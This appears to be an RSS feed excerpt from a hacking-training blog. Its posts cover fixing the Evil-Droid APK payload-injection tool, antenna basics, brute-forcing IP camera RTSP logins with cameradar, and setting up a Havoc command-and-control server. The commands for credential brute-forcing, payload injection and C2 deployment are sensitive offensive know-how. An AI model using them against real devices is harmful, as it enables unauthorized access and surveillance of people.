What are you doing to prepare?]]></content:encoded></item><item><title><![CDATA[The Ultimate Guide to Troubleshooting your Evil-Droid problems]]></title><description><![CDATA[If you've ever used Evil-Droid, you've probably encountered a variety of issues to solve. In order to save you from wandering all over...]]></description><link>https://www.hackers-arise.com/post/the-ultimate-guide-to-troubleshooting-your-evil-droid-problems</link><guid isPermaLink="false">6543bd450b6ed7670d97ca3b</guid><pubDate>Mon, 06 Nov 2023 20:44:48 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_3d6413ae2c7049bc9d58a8ee97c7db3d~mv2.png/v1/fit/w_1000,h_960,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[
<figure><img src="https://static.wixstatic.com/media/6a4a49_3d6413ae2c7049bc9d58a8ee97c7db3d~mv2.png/v1/fit/w_1000,h_960,al_c,q_80/file.png"></figure>
 
If you've ever used Evil-Droid, you've probably encountered a variety of issues to solve. In order to save you from wandering all over the internet searching for forums and videos to separately address each of these problems, we have created this post so that you can use this powerful tool without any further hassle.
 
We'll assume that you successfully installed the tool, and you won't encounter any major complications, also the procedure is clearly detailed on this website <a href="https://github.com/M4sc3r4n0/Evil-Droid" target="_blank">Official Evil-Droid</a>
 
The first common error to encounter is the "Connection Failed" error. 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_a4e9fef15f2d4e0badc7cc5c6ef2213c~mv2.png/v1/fit/w_311,h_82,al_c,q_80/file.png"></figure>
 
Chapter 1: Connection Failed
 
To resolve this issue, we will execute the following commands.
 
cd Evil-Droid
sudo nano evil-droid
 
Make sure your configuration file looks like the image below.
(It could be also: ≠ 0 or =1 you choose.)
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_5617fa74799942bc873f52d8166d3101~mv2.png/v1/fit/w_868,h_539,al_c,q_80/file.png"></figure>
 
Then save and exit:
 
ctrl + g + enter
ctrl + x + enter
 
Now we solved the connection issue, but then you run the program and when you try to inject your first payload into the APK, and you encounter this error:
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_61ba034b30a44035bf9fca01a1d156e8~mv2.png/v1/fit/w_520,h_304,al_c,q_80/file.png"></figure>
 
 
Chapter 2. [!] Failed to verify signed artifacts
 
To solve this issue, the first thing we will do is go to the following address: <a href="https://bitbucket.org/iBotPeaches/apktool/downloads/" target="_blank">https://bitbucket.org/iBotPeaches/apktool/downloads/</a>.
From there, you will download the .jar file of Apktool, version 2.4.1 (I tested a lot of them but that is the one that worked for me). 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_30222fc72aa944acb5090c389d75995f~mv2.png/v1/fit/w_1000,h_54,al_c,q_80/file.png"></figure>
 
Now go to:
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_6156a171294f4fa8a277cc3432847343~mv2.png/v1/fit/w_297,h_164,al_c,q_80/file.png"></figure>
 
Now you should replace the existing .jar file with the one you downloaded and rename it to be called apktool.jar. After that, open the attached text file and input the version (2.4.1), save it, and close it.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_a6be14d09e6e44da817dd53af6796e8c~mv2.png/v1/fit/w_373,h_213,al_c,q_80/file.png"></figure>
 
 
Before proceeding to run the application again, we must perform another step, which is choosing the specific version of JDK that works with this apktool.jar. In this case, it is the version 11.
 
Here are the commands:
sudo apt-get install openjdk-11-jdk-headless
sudo update-alternatives --config java
 
Choose option 1, which corresponds to version 11.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_c48f9bf7617145f190db0f7169bf72b8~mv2.png/v1/fit/w_707,h_189,al_c,q_80/file.png"></figure>
 
Now, run the Evil Droid program again, and you will see that before proceeding with the verification, it will ask you a series of questions (as shown in the figure below), to which you can respond using the example from the picture.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_7f7407aae1f74280b92943ca6af12045~mv2.png/v1/fit/w_583,h_516,al_c,q_80/file.png"></figure>
 
 
If everything goes well, it will proceed with verification and signing. However, it's also possible that you may encounter the following error, as shown in the picture below. This error tends to occur after resolving the previous one.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_1fea62ea1b904355ba0eeb5394f09f5b~mv2.png/v1/fit/w_985,h_322,al_c,q_80/file.png"></figure>
 
 
Chapter 3. [!] Failed to align recompiled APK
 
To solve this issue, we will need to execute a series of commands, which you will see below.
 
Step Nº 1
sudo nano /etc/apt/sources.list
 
Step N º2 
Once inside the configuration file, you will need to make the following changes:
 
#deb <a href="http://.kali.org./kali" target="_blank">http://.kali.org./kali</a> kali-rolling main contrib non-free non-free-firmware
deb <a href="http://ftp.de.debian.org/debian" target="_blank">http://ftp.de.debian.org/debian</a> buster main
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_0c53ab59729b4f8fa8f7513685e00711~mv2.png/v1/fit/w_741,h_124,al_c,q_80/file.png"></figure>
 
then you can save and exit:
 
ctrl + g + enter
ctrl + x + enter
 
Step Nº 3
 
Now, execute the following commands:
 
sudo apt - -purge remove zipalign
sudo apt update
sudo apt install zipalign
 
And that is it after all these adventures, you should be able to run your Evil-Droid without any issues until next time.
 
Smouk out!
 
If you liked what you saw, you might be interested in our Hacking Android course, part of our Subscriber PRO training.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_dec5239eb07448acbb4bc3694fc9407f~mv2.jpg/v1/fit/w_600,h_200,al_c,q_80/file.png"></figure>
 
 
]]></content:encoded></item><item><title><![CDATA[Radio Basics for Hackers, Part 4: How Antennas Work and Which are Most Effective]]></title><description><![CDATA[Welcome back, my aspiring radio hackers! Antennas are often overlooked in the grand scheme of radio hacking but they play a crucial role...]]></description><link>https://www.hackers-arise.com/post/radio-basics-for-hackers-part-4-how-antennas-work-and-which-are-most-effective</link><guid isPermaLink="false">6494bf115cb50456e4569928</guid><pubDate>Thu, 02 Nov 2023 14:46:48 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_17d21e99596447b295c9dc3dbf09722e~mv2.gif/v1/fit/w_480,h_236,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[
Welcome back, my aspiring radio hackers!
 
Antennas are often overlooked in the grand scheme of radio hacking but they play a crucial role in our capability to send and receive radio signals. Different antennas are optimized for different frequencies and in many cases, without a proper antenna you will likely be frustrated in your efforts.
 
In SDR for Hackers, different tasks will require different antennas. This is why it is crucial for you to understand the basics of antenna technology.
 
<h2>What are Antennas?</h2>
 
Antennas are devices that convert electrical energy into radio waves and vice versa. They are essential for any radio communications, as they allow radio signals to be transmitted and received.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_17d21e99596447b295c9dc3dbf09722e~mv2.gif/v1/fit/w_480,h_236,al_c,q_80/file.png"></figure>

An antenna works by creating an electric field and a magnetic field. These fields are perpendicular to each other and they oscillate at the same frequency as the radio signal. The oscillating fields radiate radio waves across the air and space.

When a radio wave hits an antenna, it induces an electric current in the antenna. This current is then amplified and processed by a radio receiver. The length of an antenna is important because it determines the frequency of the radio waves that it can radiate. The shorter the antenna, the higher the frequency of the radio waves.
 
There are many befits of using antennas including:

<ul>
<li>Increased range: Antennas can increase the range of a radio signal by allowing it to be transmitted over longer distances.</li>
<li>Reduced noise: Antennas can reduce noise by focusing the signal in a particular direction.</li>
<li>Improved signal quality: Antennas can improve the signal quality by increasing the amplitude of the signal.</li>
</ul>


<h2>Types of Antennas</h2>
<h2></h2>
There are many different types of antennas, but some of the most common include:

<ul>
<li>Dipole antennas: Dipole antennas are the simplest type of antenna. They consist of two conductors that are equal in length and are separated by a small distance.</li>
</ul>
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_5153844e81e7479393c54a17b7108ed0~mv2.webp/v1/fit/w_513,h_513,al_c,q_80/file.png"></figure>
 
<ul>
<li>Yagi antennas: Yagi antennas are more complex than dipole antennas. They consist of a dipole antenna with a number of parasitic elements. The parasitic elements help to improve the gain of the antenna. These type of antenna are excellent point-to-point capture and transmitting such as in Wi-Fi hacking.</li>
</ul>
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_71ad928d519843c19b9c09a3f7108a6f~mv2.png/v1/fit/w_449,h_489,al_c,q_80/file.png"></figure>
 
<ul>
<li>Panel antennas: Panel antennas are flat antennas that are made up of a number of radiating elements. They are often used in cellular phones and other mobile devices.</li>
</ul>
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_8c6835265211427ca4c632b3c07f3990~mv2.jpeg/v1/fit/w_625,h_625,al_c,q_80/file.png"></figure>
 
Parabolic antennas are an antenna that uses a parabolic reflector, a curved surface with the cross-sectional shape of a parabola, to direct the radio waves. The most common form is shaped like a dish and is popularly called a dish antenna or parabolic dish. The main advantage of a parabolic antenna is that it has high directivity. It functions similarly to a searchlight or flashlight reflector to direct radio waves in a narrow beam, or receive radio waves from one particular direction only.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_8b5f326887c245a9aa90163767ae7828~mv2.webp/v1/fit/w_1000,h_918,al_c,q_80/file.png"></figure>
 
The operating principle of a parabolic antenna is that a point source of radio waves at the focal point in front of a paraboloidal reflector of conductive material will be reflected into a collimated plane wave beam along the axis of the reflector. Conversely, an incoming plane wave parallel to the axis will be focused to a point at the focal point. A typical parabolic antenna consists of a metal parabolic reflector with a small feed antenna suspended in front of the reflector at its focus, pointed back toward the reflector.
 
Parabolic antennas are used in a wide variety of applications, including:
<ul>
<li>Satellite television</li>
<li>Radio astronomy</li>
<li>Cellular telecommunications</li>
<li>Radar</li>
<li>Wireless Internet</li>
</ul>
They are also used in some consumer products, such as satellite dishes and Wi-Fi boosters.
 
Some of the advantages of parabolic antennas:
<ul>
<li>High directivity: Parabolic antennas can focus radio waves into a narrow beam, which allows them to transmit or receive signals over long distances.</li>
<li>Large aperture: The large surface area of a parabolic reflector allows it to collect more radio waves, which improves the sensitivity of the antenna.</li>
<li>Wide bandwidth: Parabolic antennas can operate over a wide range of frequencies, which makes them versatile for a variety of applications.</li>
</ul>
 
The type of antenna that is used depends on the application. For example, dipole antennas are often used for broadcasting, while Yagi antennas are often used for point-to-point communication.


<h2>Radio Antenna Length</h2>
 
The radio antenna rule on length is that the antenna should be one-half or one-quarter of the wavelength of the radio signal it is designed to transmit or receive. This is because the antenna needs to be able to efficiently radiate or receive the radio waves.
 
For example, if the radio signal has a frequency of 100 MHz, then the wavelength of the signal is 3 meters (300,000,000 m/s / 100,000,000 cycles/s = 3m). So, the antenna should be either 1.5 meters long (half-wavelength) or 0.75 meters long (quarter-wavelength).
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_0c450d804dc24c31ba4ea505d60c71e5~mv2.gif/v1/fit/w_682,h_311,al_c,q_80/file.png"></figure>
 
 
In practice, it is often not possible to make an antenna exactly one-half or one-quarter of the wavelength. In these cases, the antenna can be made shorter by using a loading coil. A loading coil is a small coil of wire that is added to the antenna. The coil increases the electrical length of the antenna, making it act as if it were longer.
 
The length of the antenna is an important factor in the performance of the antenna. A well-designed antenna with the correct length will have good radiation efficiency and will be able to transmit or receive radio signals over a long distance.
 
Some additional things to keep in mind about the radio antenna rule on length:
<ul>
<li>The antenna length rule applies to all types of radio antennas, including monopoles, dipoles, and Yagi antennas.</li>
<li>The antenna length rule is not always exact. In some cases, the antenna can be slightly shorter or longer than the wavelength of the signal and still perform well.</li>
<li>The antenna length rule is only a starting point. The actual length of the antenna may need to be adjusted to achieve the desired performance.</li>
</ul>
 
<h2>Summary</h2>
<h2></h2>
Antennas are an essential element of a well functioning radio system including our SDR for Hackers. It is critical to understand antenna technology to select the proper antenna for the job. In some cases, a simple dipole antenna will suffice but satellite hacking will require a special panel antenna. I highly recommend a parabolic antenna for capturing and amplifying many radio signals.
<h2></h2>]]></content:encoded></item><item><title><![CDATA[IP Camera Hacking: Hacking IP Cameras with Cameradar]]></title><description><![CDATA[Welcome back, my aspiring IP camera hackers! As most of you know, we have played a key role in the defense of Ukraine. Among our many...]]></description><link>https://www.hackers-arise.com/post/ip-camera-hacking-hacking-ip-cameras-with-cameradar</link><guid isPermaLink="false">63a3283d05bd641b8cc7e0cc</guid><pubDate>Wed, 01 Nov 2023 19:56:44 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_a3dc76a12c8e4d2ca3fc6760b370eca3~mv2.png/v1/fit/w_553,h_488,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[Welcome back, my aspiring IP camera hackers!
 
As most of you know, we have played a key role in the defense of Ukraine. Among our many activities in defense of Ukraine is the hacking of IP cameras throughout the country. In this way, we can spy on Russian activities and war crimes. We did this at the request of the Ukraine Army starting in April 2022. 
 
<a href="https://www.hackers-arise.com/post/the-cyberwar-vs-putin-what-we-are-doing-and-what-you-can-do-to-help" target="_blank">For more on Hackers-Arise activities in Ukraine check out this post. </a> 
 
<a href="https://www.hackers-arise.com/post/we-have-successfully-accessed-many-ip-cameras-in-ukrainian-territory-to-spy-on-russian-activities" target="_blank">For more information on our IP camera hacking to support Ukraine, check out this post.</a> 
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_a3dc76a12c8e4d2ca3fc6760b370eca3~mv2.png/v1/fit/w_553,h_488,al_c,q_80/file.png"></figure>
 
 
To hack these cameras we used multiple methods and techniques. In hacking, we often need to explore multiple methods to be successful. Persistence is a key hacker characteristic. 
 
As hackers, of course, it is important to take a strategic approach to any target. Always use the simplest methods first before progressing to more advanced and time-consuming attack methods.
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_00d2ba94cd754ecfab135a833dfc8c50~mv2.png/v1/fit/w_779,h_451,al_c,q_80/file.png"></figure>
 
 
In our first step, we identified the unprotected cameras using such sites as Shodan, <a href="https://www.hackers-arise.com/post/google-hacking-the-ultimate-list-of-google-dorks-to-find-unsecured-web-cams" target="_blank">Google</a>, and Censys. Next, we tried <a href="https://www.hackers-arise.com/post/the-default-passwords-of-nearly-every-ip-camera" target="_blank">default credentials</a>. These default credentials vary by camera and manufacturer, so make certain to check our list of default credentials for nearly every camera and manufacturer. That technique yielded a few cameras.
 
Next, we tried to hack the cameras with weak passwords. This yielded significant results! The primary tool we used in that effort was cameradar. 
 
In this tutorial, I will show you how to use this tool for IP camera hacking just like we did in the Ukraine war!
 
<h2>RTSP</h2>
Before we begin to hack IP cameras, you need a bit of background in RTSP. RTSP is the protocol that most of these IP cameras use. Not all of the cameras use RTSP, but the vast majority do. Before we go any farther, we need to say that those cameras using proprietary or other protocols will not be exploitable by cameradar.
 
RTSP is an application-layer protocol used for commanding streaming media servers via pause and play capabilities. It thereby facilitates real-time control of the streaming media by communicating with the server — without actually transmitting the data itself. 
 
Rather, RTSP servers often leverage the Real-Time Transport Protocol (RTP) in conjunction with the Real-Time Control Protocol (RTCP) to move the actual streaming data. 
 
Most IP camera use the Real-Time Streaming Protocol (RTSP) to establish and control video and audio streams. The content is delivered using Real-time Transport Protocol (RTP). RSTP does not provide any configuration of the device. That must be done using the URI and IP address. Any configuration changes must be done via the web interface.
 
Most systems support RTSP as a fallback even if they are using a different protocol such a PSIA or ONVIF
 
When a user initiates a video stream from an IP camera using RTSP, the device sends an RTSP request to the streaming server. This jump starts the setup process. 
 
Subsequently, the video and audio data can then be transmitted using RTP. 
 
You can think of RTSP in terms of a television remote control for media streaming, with RTP acting as the broadcast itself.
 
While similar in some ways to <a href="https://en.wikipedia.org/wiki/HTTP" target="_blank">HTTP</a>, RTSP defines control sequences useful in controlling multimedia playback.
 
While HTTP is <a href="https://en.wikipedia.org/wiki/Stateless_server" target="_blank">stateless</a>, RTSP has state; an identifier is used when needed to track concurrent sessions
 
Like HTTP, RTSP uses TCP to maintain an end-to-end connection and, while most RTSP control messages are sent by the client to the server, some commands travel in the other direction (i.e. from server to client).
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_893c1a07281c4664b74041a42c59c638~mv2.png/v1/fit/w_611,h_116,al_c,q_80/file.png"></figure>
<a href="https://tools.ietf.org/html/rfc2326" target="_blank">RTSP uses the following commands</a>, typically sent from the client to the server, 
when negotiating and controlling media transmissions:
 
Options: This request determines what other types of requests the media server will accept.
 
Describe: A describe request identifies the URL and type of data.
 
Announce: The announce method describes the presentation when sent from the client to the server and updates the description when sent from server to client.
 
Setup: Setup requests specify how a media stream must be transported before a play request is sent.
 
Play: A play request starts the media transmission by telling the server to start sending the data.
 
Pause: Pause requests temporarily halt the stream delivery.
 
Record: A record request initiates a media recording.
 
Teardown: This request terminates the session entirely and stops all media streams.
 
Redirect: Redirect requests inform the client that it must connect to another server by providing a new URL for the client to issue requests to.
 
Other types of RTSP requests include ‘get parameter,’ ‘set parameter,’ and ’embedded (interleaved) binary data,’
 
Now that you have a little background in RTSP, you are ready to start cracking IP camera credentials!
 
<h2>Step #1: Download and Install cameradar</h2>
 
Although cameradar can be run natively in Linux, I find that it works best in a docker container.
 
First, install docker.
 
kali > sudo apt install docker
 
Next, start docker with the systemctl command;
 
kali > sudo systemctl start docker
 
Now, download cameradar.
 
kali> sudo git clone <a href="https://github.com/Ullaakut/cameradar" target="_blank">https://github.com/Ullaakut/cameradar</a> 
 
Now, you are ready to begin to brute-force IP cameras!
 
<h2>Step #2: Run the RTSP Credential Brute-forcer</h2>
 
Now that you have docker and cameradar installed, you only need to point cameradar at the IP address of the camera that you want to brute-force!
 
For instance, to brute force a camera at 192.168.1.101 (obviously, not an IP address of a real camera), we would simply enter;
 
kali > sudo docker run ullaakut/cameradar -t 192.168.1.101
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_5d7babe2b09e4408b9add7b9347b4e09~mv2.png/v1/fit/w_469,h_66,al_c,q_80/file.png"></figure>
 
cameradar will now attempt to find a RTSP stream at one of the default RTSP ports namely 554, 5554 and 8554. If you suspect there may be other ports with RTSP streams (you may want to run an nmap scan first), you can add them with the -p switch, such as
 
kali > sudo docker run ullaakut/cameradar -t 192.168.1.101 -p 9554
 
 
<h2>Step #3: Using Custom Username and Password Lists</h2>
 
By default, cameradar uses a small username and password list of the most common usernames and passwords. It's good strategy to use these first but if they are unsuccessful, it's time to bring out the big guns!
 
In this context, big guns means larger and more appropriate username and password lists. From my experience hacking cameras in Ukraine and Russia, the usernames usually are simple such as admin, root, admin1, admin3, etc. This means that you can probably use the default username list but passwords vary quite a bit. That's why you should use a good password list that is appropriate for your environment (for instance, using a Spanish list in a Spanish speaking nation).
 
First, the password list must be json format. There are several websites that can covert your text file to json such as <a href="https://anyconv.com/txt-to-json-converter/" target="_blank">https://anyconv.com/txt-to-json-converter/</a>. Your .txt file will then be appended with a json extension. So, if we were using the seclist's password list;
 
/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt, 
 
I would first convert it to json format and then use that file with cameradar. It will then appear as 10-million-password-list-top-1000000.json.
 
Now to use that password list with cameradar, you can run the following command;
 
kali> sudo docker run ullaakut/cameradar -t 
-v /usr/share/seclists/Passwords/Common-Credentials:/tmp/dictionaries 
-c "tmp/dictionaries/10-million-password-list-top-1000000.json"
-t 192.168.1.101
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_e7e01a5a0c5a4d0fa79272c88bb8cc9c~mv2.png/v1/fit/w_847,h_63,al_c,q_80/file.png"></figure>
 
<h2>Summary</h2>
 
Password Cracking of IP camera credentials is very similar to other remote password cracking once you become familiar with the RTSP protocol. In fact, in many ways it is easier, as it is rare to find a lockout (limiting how many attempts you can make) on the RTSP protocol. By using a tool like cameradar, we were able to successfully access a large percentage of IP cameras with weak passwords. 
 
 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_f1e90d4fda4d4e5eacb61a72eb6f298e~mv2.jpg/v1/fit/w_600,h_200,al_c,q_80/file.png"></figure>
 
 
<h2></h2>
<h2></h2>
<h2></h2>
<h2></h2>
<h2></h2>
<h2></h2>
<h2></h2>
<h2></h2>
<h2></h2>
<h2></h2>
<h2></h2>
 
 
]]></content:encoded></item><item><title><![CDATA[Command & Control Series Part I (Installing your own C2 Server on Kali Linux)]]></title><description><![CDATA[This series of posts is designed to guide you through setting up your own Command and Control (C2) server, specifically using the Havoc...]]></description><link>https://www.hackers-arise.com/post/command-control-series-part-i-installing-your-own-c2-server-on-kali-linux</link><guid isPermaLink="false">64f130ecbc16023453bbb201</guid><pubDate>Tue, 31 Oct 2023 14:00:32 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_9aa4c10b71454f1bbe3a7d03ce33093a~mv2.png/v1/fit/w_963,h_553,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[
<figure><img src="https://static.wixstatic.com/media/6a4a49_9aa4c10b71454f1bbe3a7d03ce33093a~mv2.png/v1/fit/w_963,h_553,al_c,q_80/file.png"></figure>
 
 
This series of posts is designed to guide you through setting up your own Command and Control (C2) server, specifically using the Havoc C2 Framework. Before diving into the technical aspects, let's first establish what a C2 server is in the context of Cyber Operations.

A Command and Control (C2) server is an integral element of advanced cyber-attacks, providing a mechanism for attackers to maintain communication with compromised devices post-infection. 
 
The architecture of C2 can be implemented in multiple ways, including but not limited to:
<ol>
<li>Deploying a Remote Access Trojan (RAT) to establish a backdoor on the victim device, thereby allowing remote control.</li>
<li>Employing a dedicated Command and Control server, managed by the attacker, to relay commands to compromised devices.</li>
<li>Utilizing a botnet, a network of compromised devices, to execute coordinated malicious activities ranging from Distributed Denial of Service (DDoS) attacks to malware dissemination.</li>
</ol>
The significance of a C2 server in cyber operations cannot be overstated. It offers attackers the capability to exfiltrate data, conduct targeted attacks, and inflict a range of damages to the victim's network.

Defensive countermeasures against C2 activities are multifaceted and include:
<ol>
<li>Implementing firewalls and Intrusion Detection/Prevention Systems (IDS/IPS) to filter and block malicious traffic.</li>
<li>Leveraging antivirus solutions to identify and eliminate malware components.</li>
<li>Regularly updating software with the latest security patches to fend off known vulnerabilities.</li>
<li>Conducting cybersecurity awareness training for staff to adhere to best practices.</li>
</ol>
Though these defenses may not offer absolute protection against C2 threats, they substantially elevate the organization's security posture, making it increasingly challenging for attackers to establish a successful Command and Control infrastructure, but that's a discussion for another time.

<figure><img src="https://static.wixstatic.com/media/6a4a49_f72645605bb64d61881221f629ac7373~mv2.png/v1/fit/w_831,h_300,al_c,q_80/file.png"></figure>
 
 
Having made the case introductions, let's get down to business and install our first own Command and Control server and for this, we need to open a terminal in our Kali Linux distribution:
 
Step 1. git clone <a href="https://github.com/HavocFramework/Havoc.git" target="_blank">https://github.com/HavocFramework/Havoc.git</a>
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_108d016b148a4c2a98756642a31f7d86~mv2.png/v1/fit/w_551,h_208,al_c,q_80/file.png"></figure>
 
and if all goes well, you should see the following:
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_9b185f4128864a0d8647c145e291fb42~mv2.png/v1/fit/w_557,h_182,al_c,q_80/file.png"></figure>
 
now if you do an ls command you will be able to see the directories that appear in the image below, then execute cd Havoc:
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_b2956745d0704e9b95aa50e8c5c785f8~mv2.png/v1/fit/w_535,h_569,al_c,q_80/file.png"></figure>
 
Step 2. You are now inside of Havoc directory and there you will execute the following:
 
sudo apt install -y git build-essential apt-utils cmake libfontconfig1 libglu1-mesa-dev libgtest-dev libspdlog-dev libboost-all-dev libncurses5-dev libgdbm-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev libbz2-dev mesa-common-dev qtbase5-dev qtchooser qt5-qmake qtbase5-dev-tools libqt5websockets5 libqt5websockets5-dev qtdeclarative5-dev golang-go qtbase5-dev libqt5websockets5-dev python3-dev libboost-all-dev mingw-w64 nasm
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_2928352349fa4d70b7c524477ef0c9b7~mv2.png/v1/fit/w_541,h_343,al_c,q_80/file.png"></figure>
 
By doing this, you will be installing a variety of packages necessary for the proper functioning of our Command and Control server and if all goes well, you should see the following:
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_3d486c8dde334957b781d2d588c0dfd7~mv2.png/v1/fit/w_544,h_252,al_c,q_80/file.png"></figure>
 
then you need to get into the teamserver directory by doing cd teamserver and if you do an ls you should see what appears in the image below:
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_a1fc40f8bca74fa69253a20f10623816~mv2.png/v1/fit/w_464,h_242,al_c,q_80/file.png"></figure>
 
Step 3. Now you have to execute the following:
 
go mod download golang.org/x/sys
go mod download github.com/ugorji/go
If everything goes well, you should see something similar to what appears in the figure below, after which you will need to exit that directory by executing cd ..
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_43c1644578434e89bb8afb5a7a4c5d80~mv2.png/v1/fit/w_464,h_300,al_c,q_80/file.png"></figure>
 
Step 4. Now from Havoc Root directory, we will build the server side by executing:
 
make ts-build
<figure><img src="https://static.wixstatic.com/media/6a4a49_1564a6c7d3624848a0d844e50be6c371~mv2.png/v1/fit/w_537,h_579,al_c,q_80/file.png"></figure>
 
If everything goes well, you should see something similar to what appears in the figure below:
<figure><img src="https://static.wixstatic.com/media/6a4a49_1c13021a4b564c3b816c1af3c2b8f363~mv2.png/v1/fit/w_543,h_227,al_c,q_80/file.png"></figure>
 
Now we'll need to run the teamserver, but first, I recommend that you split your terminal screen into two with a vertical view this is to facilitate simultaneous monitoring and operation, especially useful when working with Command and Control servers like we are doing here.
 
Execute the following:
./havoc
<figure><img src="https://static.wixstatic.com/media/6a4a49_435f7716beb34481bbf4140ab24b2958~mv2.png/v1/fit/w_559,h_159,al_c,q_80/file.png"></figure>
 
after that, you should see something like this: 
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_272381285d1c4ceab3cec0e981e254a8~mv2.png/v1/fit/w_543,h_280,al_c,q_80/file.png"></figure>
 
Step 5. Now we have the split view so on the left screen we have the teamserver running and on the right screen let's build the client side by executing the following:
 
cd Havoc
make client-build
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_dd30cd6e11c04a7da03f5ef56b08542e~mv2.png/v1/fit/w_1000,h_322,al_c,q_80/file.png"></figure>
 
after this, we will run the client like we did with the server:
./havoc client
<figure><img src="https://static.wixstatic.com/media/6a4a49_18b66ae869b94cc590046803ad8d7519~mv2.png/v1/fit/w_916,h_155,al_c,q_80/file.png"></figure>
 
after this process, you should see this screen:
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_dc53eefec53e4f0c9218fd60defdb110~mv2.png/v1/fit/w_926,h_514,al_c,q_80/file.png"></figure>
 
Now to fill that prompt you have to follow the next step:
 
Step 6. Open up a new terminal and execute the following commands
 
1. cd Havoc
2. ls
3. cd data
4. ls
5. mousepad havoc.yaotl
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_d969927265df47a4a387557edf3134b2~mv2.png/v1/fit/w_517,h_589,al_c,q_80/file.png"></figure>
 
and what you will see is the actual C2 profile and you need the Data that you have inside that file to fill the final prompt we got in <a href="#eidkn" rel="noopener noreferrer">Step 5</a> and what you will actually use is the following:
 
<ol>
<li>Port: 40056</li>
<li>User: Neo</li>
<li>Password: password1234</li>
</ol>
Those are the default credentials:
<figure><img src="https://static.wixstatic.com/media/6a4a49_eb0e0266ee7048e4989ac1040ab97b3a~mv2.png/v1/fit/w_534,h_404,al_c,q_80/file.png"></figure>
 
Now you can close the mousepad and then go to your terminal and get the IP of your virtual machine by using the command ifconfig
Now use all the information you have to fill in the prompt like the one you see in the picture below, you can choose the name you want I choose Demon.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_4f45f94cb9ae427f900301f3da8928a4~mv2.png/v1/fit/w_429,h_244,al_c,q_80/file.png"></figure>
 
Now hit the Connect button and you will be good to go, the final screen you will get is the one below and if you are watching this is because you are now in control of your own C2 Server.
 
<figure><img src="https://static.wixstatic.com/media/6a4a49_72376fa2c3764e8f97756ee3d05c91b3~mv2.png/v1/fit/w_1000,h_436,al_c,q_80/file.png"></figure>
Next time we will teach you how to Operate and control the victim machine with your C2.
Smouk out!
 
If you liked what you saw, you might be interested in our Hacking Infrastructure course, or perhaps you'd like to consider becoming part of our community by becoming a Subscriber PRO.
]]></content:encoded></item><item><title><![CDATA[Getting Started with Docker, Part 1: Installing Kali Linux in a docker Container]]></title><description><![CDATA[Welcome back, my aspiring cyberwarriors! Increasingly, we are seeing cybersecurity tools and apps using docker. For instance, in my...]]></description><link>https://www.hackers-arise.com/post/getting-started-with-docker-part-1</link><guid isPermaLink="false">653195897bdc9c39f7e1d582</guid><pubDate>Fri, 20 Oct 2023 19:03:43 GMT</pubDate><enclosure url="https://static.wixstatic.com/media/6a4a49_cc1ac6a2d77d4fa0bebe3b96b0680fb2~mv2.png/v1/fit/w_800,h_236,al_c,q_80/file.png" length="0" type="image/png"/><dc:creator>otw</dc:creator><content:encoded><![CDATA[
Welcome back, my aspiring cyberwarriors!
 
Increasingly, we are seeing cybersecurity tools and apps using docker. For instance, in my tutorial on<a href="https://www.hackers-arise.com/post/ip-camera-hacking-hacking-ip-cameras-with-cameradar" target="_blank"> </a><a href="https://www.hackers-arise.com/post/ip-camera-hacking-hacking-ip-cameras-with-cameradar" target="_blank">IP camera credential brute forcing</a>, we used docker to contain our app. To help you understand docker, Aircorridor has written a short tutorial here to explain what it is and how it works.


<h2>What is Docker?</h2>

Docker is an open-source platform for developing, shipping, and running applications. It uses OS (operating system)-level virtualization to create containers, which are lightweight, standalone packages that include everything an application needs to run: code, libraries, and dependencies. Containers isolate applications from the underlying system, making them consistent and portable.
 
Docker simplifies the process of managing software by ensuring that what you develop and test in one environment, will work reliably in another.
 
<h2></h2>
<figure><img src="https://static.wixstatic.com/media/6a4a49_cc1ac6a2d77d4fa0bebe3b96b0680fb2~mv2.png/v1/fit/w_800,h_236,al_c,q_80/file.png"></figure>

Get to know why and how it replace virtual machines
<h2></h2>
